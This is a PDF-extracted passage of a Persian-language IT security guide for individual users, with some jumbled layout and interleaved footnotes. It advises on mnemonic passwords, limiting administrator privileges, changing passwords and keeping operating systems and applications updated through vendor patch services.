ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﺷﻜﺎﻝ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﺩﺍﺳﺘﺎﻥ
ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺩﺭ ﺯﺑﺎﻥ ﺍﻧﮕﻠﻴﺴﻲ ﺩﺍﺳﺘﺎﻧﻬﺎﻱ ﻛﻮﺩﻛﺎﻥ
ﻻ ﺑـﺎ ﻋﺒـﺎﺭﺕ Once upon a time,
ﻣﻌﻤـﻮ ﹰ
there wasﺷﺮﻭﻉ ﻣﻲﺷﻮﻧﺪ .ﺩﺭ ﺍﻳـﻦ ﻣﺜـﺎﻝ ﺍﺯ
ﺍﺑﺘﺪﺍﻱ ﻫﺮ ﻟﻐﺖ ﺩﻭ ﺣﺮﻑ ﮔﺮﻓﺘﻪ ﺷـﺪﻩ ﺗـﺎ ﻃـﻮﻝ
ﻛﻠﻤﻪ ﻋﺒﻮﺭ ﻣﺤﺪﻭﺩ ﺷـﻮﺩ ﻭ ﺩﺭ ﻋـﻴﻦ ﺣـﺎﻝ ﻗﺎﺑـﻞ
ﺷﻨﺎﺳﺎﻳﻲ ﻧﺒﺎﺷﺪ.
@oNup
T-1thuua
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻫﻤﺎﻥ ﻋﺒﺎﺭﺕ ﻗﺒﻠـﻲ ﻛـﻪ ﺩﺭ ﺁﻥ ﺟـﺎﻳﮕﺰﻳﻨﻲﻫـﺎ ﻭ
ﻋﻼﻣﺘﻬﺎﻱ ﮔﻔﺘﻪﺷﺪﻩ ﺑﻜﺎﺭ ﺭﻓﺘﻪ ﺍﺳﺖ.
ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ
ﺍﻛﺜﺮ ﺳﻴﺴﺘﻤﻬﺎ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻣﺘﻴﺎﺯﺍﺕ ٢٦ﻣﺤﺪﻭﺩﻱ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨـﺪ
ﻛﻪ ﺍﺯ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﻛﻤﺘﺮ ﺍﺳـﺖ .ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺭﺍﻫﺒـﺮ ﻭ
ﻛﺎﺭﺑﺮ ﺭﺍﻳﺎﻧﻪ ﻳﻜﻲ ﺑﺎﺷﻨﺪ )ﻧﻈﻴﺮ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ( ﻛـﺎﺭﺑﺮ
ﻛﻠﻴﺔ ﻛﺎﺭﻫﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻣﺘﻴـﺎﺯ ﺩﺳﺘﺮﺳـﻲ ﻛﺎﻣـﻞ
)ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﻳﺸﻪ ٢٧ﻳﺎ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮ (٢٨ﺍﻧﺠﺎﻡ ﻣﻲ ﺩﻫﺪ؛ ﺩﺭﺣﺎﻟﻴﻜﻪ ﺑﻬﺘﺮ
ﺍﺳﺖ ﺑﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻏﻴﺮﺭﺍﻫﺒﺮﻱ ﺍﺯ ﻳـﻚ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﻣﺠـﺰﺍ
ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ .ﺍﻳﻨﻜﺎﺭ ﺍﺣﺘﻤﺎﻝ ﺧﺮﺍﺏ ﺷﺪﻥ ﻧﺎﺧﻮﺍﺳـﺘﺔ ﺳﻴـﺴﺘﻢ ﺭﺍ
ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ ﻭ ﺩﺭﺻﻮﺭﺕ ﻧﻔﻮﺫ ﻣﻬﺎﺟﻢ ﻧﻴﺰ ﺍﺯ ﺁﺳﻴﺐ ﻭﺍﺭﺩﻩ ﺑـﻪ
ﺳﻴﺴﺘﻢ ﺗﺎ ﺣﺪ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﻣﻲﻛﺎﻫﺪ.
ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻭﺏ ﺗﻐﻴﻴﺮ ﻛﻨﻨﺪ ،ﺍﻣﺎ ﺗﻨﺎﻭﺏ ﺍﻳـﻦ
ﺗﻐﻴﻴﺮ ﻫﻤﭽﻨﺎﻥ ﻣﻮﺭﺩ ﺑﺤﺚ ﺍﺳﺖ .ﺑﺮﺧﻲ ﺍﺯ ﻣﺘﺨﺼﺼﺎﻥ ﺍﻣﻨﻴﺘـﻲ
ﺗﻮﺻﻴﻪ ﻛﺮﺩﻩ ﺍﻧﺪ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻓﻮﺍﺻﻞ ﺯﻣـﺎﻧﻲ ﻛﻮﺗـﺎﻩ
ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ؛ ﺍﻣﺎ ﻋﺪﻩﺍﻱ ﻣﻌﺘﻘﺪﻧـﺪ ﻛـﻪ ﺍﻳﻨﻜـﺎﺭ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺳﺎﺩﻩ ﺍﻧﺘﺨـﺎﺏ ﺷـﻮﻧﺪ ﻭ ﻳـﺎ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ
ﻓﺮﺍﻣــﻮﺵ ﺷــﺪﻥ ﺩﺭ ﺟــﺎﻳﻲ ﻧﻮﺷــﺘﻪ ﺷــﻮﻧﺪ .ﺑــﺮﺍﻱ ﻛﺎﺭﺑﺮﺩﻫــﺎﻱ
ﻣﻌﻤﻮﻟﻲ ﻧﻜﺎﺕ ﺯﻳﺮ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﻧﺪ:
•
ﺍﮔﺮ ﻓﻜﺮ ﻣﻲﻛﻨﻴﺪ ﺭﻣﺰ ﻋﺒﻮﺭﺗﺎﻥ ﺩﺭ ﻣﻌﺮﺽ ﺳـﺮﻗﺖ ﺑـﻮﺩﻩ
ﺳﺮﻳﻌﹰﺎ ﺁﻧﺮﺍ ﻋﻮﺽ ﻛﻨﻴﺪ.
•
ﺍﮔﺮ ﺭﻣﺰ ﻋﺒﻮﺭﺗﺎﻥ ﺭﺍ ﺑﻪ ﻫﺮ ﺩﻟﻴﻠـﻲ ﺑـﻪ ﺷـﺨﺺ ﺩﻳﮕـﺮﻱ
ﺩﺍﺩﻩﺍﻳﺪ ﺑﺴﺮﻋﺖ ﺁﻧﺮﺍ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ .ﺑـﻪ ﺍﺷـﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻦ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭ ﺻﺤﻴﺤﻲ ﻧﻴﺴﺖ ﻭ ﺑﺎﻳﺪ ﺍﺯ ﺁﻥ ﺍﺟﺘﻨﺎﺏ
ﻛﺮﺩ؛ ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﻭﺍﻗﻌﹰﺎ ﭼـﺎﺭﻩﺍﻱ ﺟـﺰ ﺁﻥ ﻭﺟـﻮﺩ ﻧﺪﺍﺷـﺘﻪ
ﺑﺎﺷﺪ.
•
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻭﺏ ﻋـﻮﺽ ﻛﻨﻴـﺪ .ﻣﻌﻨـﻲ
ﻛﻠﻤﺔ "ﻣﺘﻨﺎﻭﺏ" ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻒ ،ﻣﺘﻔﺎﻭﺕ ﺍﺳـﺖ.
ﺷﺎﻳﺪ ﺩﻭﺭﻩﻫﺎﻳﻲ ﺑﻴﻦ ۶ﻣﺎﻩ ﺗﺎ ﻳﻜﺴﺎﻝ ﺑـﻪ ﻧﻈـﺮ ﻣﻨﺎﺳـﺐ
ﺑﺎﺷﻨﺪ.
•
ﺍﮔﺮ ﺳﻴﺎﺳﺖ ﺳﺎﺯﻣﺎﻧﻲ ﺷﻤﺎ ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﺩﻗﻴﻘﺘﺮ ﺍﺳـﺖ ﺍﺯ
ﺁﻥ ﭘﻴﺮﻭﻱ ﻛﻨﻴﺪ.
Privilege
Root Privilege
Administrator Privilege
26
27
28
٦٥
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﻻ ﺑـﺮﺍﻱ ﻛـﺎﺭﺑﺮﺍﻥ
ﺍﺳﺖ .٣٠ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺍﻏﻠﺐ ﻣﺤﺼﻮﻻﺕ ﻣﻌﻤﻮ ﹰ
ﻫﺰﻳﻨﻪﺍﻱ ﺩﺭ ﺑﺮ ﻧﺪﺍﺭﺩ.
ﻓﺼﻞ ﭼﻬﺎﺭﻡ
ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ
ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ
ﻛﻠﻴﺎﺕ
ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺑﺮﺭﺳﻲ ﻓﻨﻮﻧﻲ ﻣﻲﭘـﺮﺩﺍﺯﻳﻢ ﻛـﻪ ﺍﺯ ﺁﻧﻬـﺎ ﺑـﺮﺍﻱ
ﻛﺎﻫﺶ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺩﺭ
ﺑﺮﺍﺑﺮ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ.
ﻣﻘﺪﻣﻪ
ﺍﺻﻞ ﺍﻭﻝ :ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻨﺪ.
ﺍﺻﻞ ﺩﻭﻡ :ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺷﻜﺎﻝ ﺩﺍﺭﻧﺪ.
ﺍﺻﻞ ﺍﻭﻝ ﺑﺪﻳﻬﻲ ﺍﺳﺖ؛ ﻭ ﺍﺻﻞ ﺩﻭﻡ ﻧﻴـﺰ ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﺍﻳﻨﻜـﻪ
ﻼ ﻣـﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ
ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ ﺍﻓﺮﺍﺩ ﺑﺪﻭﻥ ﻧﻘـﺺ ﻧﻴـﺴﺘﻨﺪ ﻛـﺎﻣ ﹰ
ﺍﺳﺖ .ﻣﻌﻠﻮﻡ ﻧﻴﺴﺖ ﭼـﺮﺍ ﺍﻳـﻦ ﺣﺠـﻢ ﺯﻳـﺎﺩ ﺍﺯ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ
ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﺷﻜﺎﻻﺕ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﻫﺴﺘﻨﺪ .ﻫﻨﮕﺎﻡ ﺗﻮﺳﻌﻪ ﺑﺮﻧﺎﻣﻪ
٢٩
ﺑﺮﺍﺣﺘﻲ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺑﺮﻭﺯ ﺍﺷﻜﺎﻻﺗﻲ ﻧﻈﻴﺮ ﺳـﺮﺭﻳﺰ ﺷـﺪﻥ ﺑـﺎﻓﺮ
ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ ،ﺍﻣﺎ ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﺗﻘﺮﻳﺒـﹰﺎ ﻧﻴﻤـﻲ ﺍﺯ
ﻣﺸﻜﻼﺕ ﺟﺪﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﺍﻳﻦ ﺩﺳﺘﻪﺍﻧﺪ.
ﻭﻗﺘﻲ ﺑـﻪ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﻓﺮﻭﺷـﻨﺪﺓ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﻣﺮﺍﺟﻌـﻪ ﻣـﻲﻛﻨﻴـﺪ
ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻭ ﻧﺴﺨﻪﻫﺎﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺧﻮﺩ ﺭﺍ ﺗﻌﻴـﻴﻦ
ﻣﻲﻧﻤﺎﻳﻴﺪ ﻭ ﺳﭙﺲ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻓﻬﺮﺳـﺘﻲ ﺍﺯ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲﻫـﺎﻱ
ﻼ
ﻗﺎﺑﻞ ﺩﺭﻳﺎﻓﺖ ﺭﺍ ﺍﺭﺍﺋﻪ ﺧﻮﺍﻫـﺪ ﻛـﺮﺩ .ﺩﺭ ﺑﺮﺧـﻲ ﺍﺯ ﻣـﻮﺍﺭﺩ ﻛـﺎﻣ ﹰ
ﻣﺸﺨﺺ ﺍﺳﺖ ﻛﻪ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﻫﺎﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪ ﺷـﻤﺎ
ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ ،ﺍﻣﺎ ﺩﺭ ﺑﻌﻀﻲ ﻣـﻮﺍﺭﺩ ﺩﻳﮕـﺮ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ
ﻭﺿﻮﺡ ﻛﻤﺘﺮﻱ ﺩﺍﺭﺩ .ﻭﻗﺘﻲ ﺷﻤﺎ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮﺗﺎﻥ
ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻳﺪ ،ﺁﻧﻬﺎ ﺭﺍ downloadﻣﻲﻛﻨﻴـﺪ ﻭ ﺩﺭ ﻣﺮﺣﻠـﺔ
ﺑﻌﺪ ﺁﻧﻬﺎ ﺭﺍ ﻧﺼﺐ ﻣﻲﻧﻤﺎﻳﻴﺪ .ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻧـﻮﻉ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺍﻣﻜـﺎﻥ
ﺩﺍﺭﺩ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ downloadﻛﺮﺩﻩﺍﻳـﺪ ﺑـﺴﺎﺩﮔﻲ ﻭ ﺩﺭ ﻳـﻚ
ﻣﺮﺣﻠﻪ ﺍﺟﺮﺍ ﺷﻮﺩ ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﺑﺮﺍﻱ ﻧﺼﺐ ﺷﺪﻥ ﻧﻴﺎﺯﻣﻨـﺪ ﺍﺟـﺮﺍﻱ
ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﺧﺎﺻﻲ ﺑﺎﺷﺪ .ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ
ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﺑﻌﺪ ﺍﺯ downloadﺷﺪﻥ ﺗﻘﺮﻳﺒﹰﺎ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ
ﻧﺼﺐ ﻣﻲﮔﺮﺩﺩ.
ﻻ ﺍﺯ ﺳﻪ ﺭﻭﺵ ﻋﻤﺪﻩ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺧـﺪﻣﺎﺕ
ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﻣﻌﻤﻮ ﹰ
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ:
.۱
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺠﺎﺭﻱ
ﻻ ﭼﮕﻮﻧﻪ ﻛﺎﺭ ﻣﻲﻛﻨﺪ؟
ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﺠﺎﺭﻱ ﻣﻌﻤﻮ ﹰ
ﭼﻨﺪ ﺳﺎﻝ ﻗﺒﻞ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﻣﻲﺧﺮﻳﺪﻳﺪ ،ﺗﺎ ﺯﻣـﺎﻥ
ﻋﺮﺿﺔ ﻧﺴﺨﺔ ﺟﺪﻳﺪ ﺁﻥ ﺑﻪ ﺑﺎﺯﺍﺭ ﻫﻴﭻ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺩﺭ ﺁﻥ ﺍﻋﻤﺎﻝ
ﻧﻤﻲﺷﺪ .ﺍﻣﺮﻭﺯﻩ ﺑﺪﻻﻳﻞ ﻣﺨﺘﻠﻒ -ﺑﺨﺼﻮﺹ ﺑﻪ ﺩﻟﻴـﻞ ﻣـﺴﺎﺋﻞ
ﺍﻣﻨﻴﺘــﻲ -ﺑﻴــﺸﺘﺮ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎ ﺑــﺼﻮﺭﺕ ﻣــﻨﻈﻢ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ
ﻣﻲﺷﻮﻧﺪ .ﺑـﺮﺍﻱ ﺑﺮﺧـﻲ ﺍﺯ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻣﺜـﻞ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎ،
"ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣﻨﻈﻢ" ﺑﻪ ﻣﻌﻨـﻲ ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺑـﺼﻮﺭﺕ ﺭﻭﺯﺍﻧـﻪ
Buffer Overflow
29
۳۰
ﺑـﺮﺍﻱ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﻧﻈﻴـﺮ ،Microsoft Windows
ﺷﺮﻛﺖ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ
ﭘﺎﻳﮕﺎﻩ ﻭﺏ " "Windows Updateﻣﻨﺘـﺸﺮ ﻣـﻲﻛﻨـﺪ.
ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛـﺮﺩﻩ ﻭ
ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺭﺍﺋـﻪ
ﻣﻲﻧﻤﺎﻳـﺪ ،ﻭ ﺁﻧﮕـﺎﻩ ﺷـﻤﺎ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺍﻧﺘﺨـﺎﺏ،
downloadﻭ ﻧﺼﺐ ﻛﻨﻴﺪ.
ﺩﺭ ﺍﻛﺘﺒﺮ ۲۰۰۳ﻭ ﺑﺪﻧﺒﺎﻝ ﻳﻚ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘﻲ ﺟﺪﻱ ﺩﺭ Microsoft
،Windowsﻣﺎﻳﻜﺮﻭﺳــﺎﻓﺖ ﻧﺘﻴﺠــﻪﮔﻴــﺮﻱ ﻛــﺮﺩ ﻛــﻪ ﺷــﺎﻳﺪ ﻏﻴــﺮ
ﻭﺍﻗﻊﺑﻴﻨﺎﻧﻪ ﻭ ﻧﺎﻣﻌﻤﻮﻝ ﺑﺎﺷﺪ ﻛﻪ ﺗﻮﻗﻊ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﺎﺭﺑﺮﺍﻥ ﻭﺻـﻠﻪﻫـﺎﻱ
ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﻄﻮﺭ ﻫﻔﺘﮕﻲ ﻧـﺼﺐ ﻛﻨﻨـﺪ؛ ﻭ ﻟـﺬﺍ ﺍﺯ ﺁﻥ ﭘـﺲ ﻭﺻـﻠﻪﻫـﺎ ﺭﺍ
ﺑﺼﻮﺭﺕ ﻣﺎﻫﺎﻧﻪ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﺪ ،ﻣﮕﺮ ﺩﺭ ﺣﺎﻟﺘﻲ ﻛﻪ ﻣﺸﻜﻞ ﺑﺴﻴﺎﺭ ﺟﺪﻱ
ﻭ ﻓﻮﺭﻱ ﺑﺎﺷﺪ.
ﺑﺨﺶ ﺩﻭﻡ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﺠﺎﺭﻱ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ ﺑـﺮﺍﻱ
ﺭﻓــﻊ ﺍﺷــﻜﺎﻻﺕ ﻭ ﺁﺳــﻴﺐﭘــﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﻧــﺮﻡﺍﻓــﺰﺍﺭ،
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﻫﺎﻱ ﺁﻧﺮﺍ ﻧﻴﺰ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ .ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓـﺖ ﺧـﺪﻣﺎﺕ
ﻻ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺑﺰﺭﮒ ﻣﻌﻤﻮ ﹰ
ﺁﻧﻬﺎ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﻭ ﺍﺯ ﻗﺴﻤﺖ " "Supportﻳـﺎ ""Download
ﺍﺻﻼﺣﺎﺕ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺑﺮﺍﻱ ﻣﺤﺼﻮﻻﺕ ﺭﺍ ﺑﻴﺎﺑﻴﺪ.
٦٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
.۲
ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺑـﺴﺘﺔ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﻛـﻪ ﺑـﻪ ﺭﻭﺵ ﻓـﻮﻕ
downloadﻣﻲﺷﻮﺩ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻭﺍﻗﻌﻲ ﻧﻴﺴﺖ ،ﺑﻠﻜـﻪ
ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺯﻣﺎﻥ ﺍﺟﺮﺍ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻭﺍﻗﻌـﻲ ﺭﺍ
downloadﻣﻲﻛﻨﺪ .ﺍﻳﻦ ﺑﺮﻧﺎﻣـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺗﻨﻬـﺎ
۵۰۰ﻛﻴﻠﻮ ﺑﺎﻳﺖ ﺣﺠﻢ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ -ﻛﻪ ﺍﻧﺪﺍﺯﺓ ﻛﻮﭼﻜﻲ
ﺑﺮﺍﻱ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﺩ؛
ﺍﻣﺎ ﺩﺭ ﺣﻘﻴﻘﺖ ﺍﻳﻦ ﻓﻘﻂ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ
ﻭﺍﻗﻌﻲ ﺭﺍ downloadﻣـﻲﻛﻨـﺪ ﻭ ﺳـﭙﺲ ﺁﻧـﺮﺍ ﻧـﺼﺐ
ﻣﻲ ﻧﻤﺎﻳﺪ؛ ﻭ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻭﺍﻗﻌﻲ ﺷﺎﻳﺪ ﺍﻧﺪﺍﺯﻩﺍﻱ ﺩﺭ ﺣﺪﻭﺩ
۳۰ﻣﮕﺎ ﺑﺎﻳﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
.۳
ﺑﺮﺧﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺩﺍﺭﺍﻱ ﺗﻮﺍﺑﻊ ﺍﺯ ﭘﻴﺶ ﺗﻌﺮﻳـﻒ ﺷـﺪﻩﺍﻱ
ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺼﻮﺭﺕ ﭘﻮﻳﺎ ﺑﻪ ﺑﺮﺭﺳـﻲ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲﻫـﺎﻱ
ﺍﺭﺍﺋــﻪﺷــﺪﻩ ﻣــﻲﭘﺮﺩﺍﺯﻧــﺪ ﻭ ﺑــﺎ ﺍﺟــﺎﺯﺓ ﻛــﺎﺭﺑﺮ ﺁﻧﻬــﺎ ﺭﺍ
downloadﻭ ﻧﺼﺐ ﻣﻲﻧﻤﺎﻳﻨﺪ.
ﺩﺭ ﺷﺮﺍﻳﻄﻲ ﻛﻪ ﺍﺣﺘﻤﺎﻝ ﺧﻄﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺭﺣﺎﻝ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺖ
ﺭﺍﻩ ﺍﻭﻝ ﻣﻨﻄﻘﻲ ﺑﻨﻈﺮ ﻧﻤﻲﺭﺳﺪ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺗﻨﻬـﺎ ﮔﺰﻳﻨـﺔ ﻣﻨﺎﺳـﺐ
downloadﻛــﺮﺩﻥ ﻭ ﺑــﻪﺍﺷــﺘﺮﺍﻙﮔﺬﺍﺷــﺘﻦ ﻭﺻــﻠﻪﻫــﺎ ﻭ
ﺍﺻﻼﺣﻬﺎﻱ downloadﺷﺪﻩ ﺍﺳﺖ.
ﭼﻨﺪ ﺭﺍﻩ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻭﺟﻮﺩ ﺩﺍﺭﺩ:
•
ﺍﮔﺮ ﺳﺎﺯﻣﺎﻧﻲ ﺩﺍﺭﺍﻱ ﻣﺎﺷﻴﻨﻬﺎﻱ ﻣﺘﻌﺪﺩ ﺑﺎﺷﺪ ،ﺭﺍﻫﺒـﺮ ﻓﻨـﻲ
ﺑﺎﻳــﺪ ﻣــﺴﺌﻮﻟﻴﺖ downloadﻭ ﻧــﺼﺐ ﺑــﺴﺘﻪﻫــﺎﻱ
